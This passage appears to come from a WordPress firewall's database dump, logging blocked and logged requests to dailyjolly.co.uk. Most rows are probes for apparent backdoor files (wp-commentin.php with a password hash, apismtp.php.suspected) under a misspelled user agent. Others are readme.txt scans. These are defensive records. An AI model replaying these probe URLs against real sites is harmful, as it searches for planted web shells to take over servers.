User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11701,1674172107.961901,1674172107.832000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11702,1674172087.170277,1674172087.040200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11703,1674172067.502073,1674172067.379000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11704,1674172064.639944,1674172064.527400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11705,1674172061.482198,1674172061.353600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11706,1674172056.374263,1674172056.247100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11707,1674172049.410214,1674172049.223700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11708,1674172041.414374,1674172041.276700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11709,1674172029.987277,1674172029.857000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11710,1674172020.758630,1674172020.592000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11711,1674176171.618609,1674176171.489500,'\0\0\0\0\0\0\0\0\0\0���r-',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/elementor/readme.txt',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11712,1674176171.618494,1674176171.489500,'\0\0\0\0\0\0\0\0\0\0���r-',0,200,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/elementor/readme.txt',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11713,1674176184.467259,1674176184.335800,'\0\0\0\0\0\0\0\0\0\0���r-',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/elementor/readme.txt',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11714,1674176184.467137,1674176184.335800,'\0\0\0\0\0\0\0\0\0\0���r-',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/elementor/readme.txt',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(11715,1674195746.103127,1674195745.988500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11716,1674195742.578529,1674195742.433400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11717,1674195734.206514,1674195734.089300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11718,1674195731.380973,1674195731.233500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11719,1674195724.421111,1674195723.626100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11720,1674195851.216990,1674195851.080800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11721,1674195880.335365,1674195880.222100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11722,1674195876.254343,1674195876.135800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11723,1674195872.952884,1674195872.824100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11724,1674195856.137324,1674195856.018900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11725,1674201215.682296,1674201215.528400,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11726,1674201215.451918,1674201215.312400,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11727,1674201215.160269,1674201214.876700,'\0\0\0\0\0\0\0\0\0\0��(uSn',0,403,0,0,0,'https://www.dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 